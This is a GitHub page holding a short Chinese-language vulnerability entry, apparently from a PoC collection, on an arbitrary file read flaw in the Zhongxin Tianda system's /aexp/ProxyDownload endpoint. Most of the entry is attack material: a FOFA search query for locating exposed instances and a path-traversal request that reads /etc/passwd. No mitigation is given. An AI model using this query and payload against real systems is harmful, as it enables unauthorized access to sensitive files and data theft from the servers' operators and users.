Skip to content

Latest commit

 

History

History
17 lines (11 loc) · 481 Bytes

中新天达系统存在任意文件读取漏洞.md

File metadata and controls

17 lines (11 loc) · 481 Bytes

中新天达系统存在任意文件读取漏洞

中新天达系统/aexp/ProxyDownload存在任意文件读取漏洞,可能导致敏感信息泄露、数据盗窃及其他安全风险,从而对系统和用户造成严重危害。

fofa

body="aexp/ValidateImage"

poc

/aexp/ProxyDownload?path=/speedec/webapps/webftp/../../../../etc/passwd

图片